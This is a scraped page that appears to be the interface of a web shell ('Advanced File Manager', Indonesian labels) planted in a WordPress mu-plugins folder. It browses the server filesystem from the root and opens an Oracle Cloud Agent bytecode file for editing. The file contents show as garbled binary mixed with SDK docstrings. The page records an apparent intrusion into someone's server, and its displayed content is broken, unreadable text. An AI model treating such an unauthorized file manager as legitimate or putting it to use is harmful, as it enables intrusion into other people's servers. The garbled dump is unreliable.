📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
log_analytics
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/log_analytics/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: namespace.pyc
a O��f� � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z ed d� �Z e jdd� �Z edd� �Zejdd� �Zdd� Zdd� Z dd� ZdS )� NamespacezS This is the namespace details of a tenancy in Logan Analytics application c K sF dddddd�| _ dddddd�| _d | _d | _d | _d | _d | _d S ) a� Initializes a new Namespace object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param namespace_name: The value to assign to the namespace_name property of this Namespace. :type namespace_name: str :param compartment_id: The value to assign to the compartment_id property of this Namespace. :type compartment_id: str :param is_onboarded: The value to assign to the is_onboarded property of this Namespace. :type is_onboarded: bool :param is_log_set_enabled: The value to assign to the is_log_set_enabled property of this Namespace. :type is_log_set_enabled: bool :param is_data_ever_ingested: The value to assign to the is_data_ever_ingested property of this Namespace. :type is_data_ever_ingested: bool �str�bool)�namespace_name�compartment_id�is_onboarded�is_log_set_enabled�is_data_ever_ingested� namespaceName� compartmentId�isOnboarded�isLogSetEnabled�isDataEverIngestedN)� swagger_types� attribute_map�_namespace_name�_compartment_id� _is_onboarded�_is_log_set_enabled�_is_data_ever_ingested)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/log_analytics/models/namespace.py�__init__ s"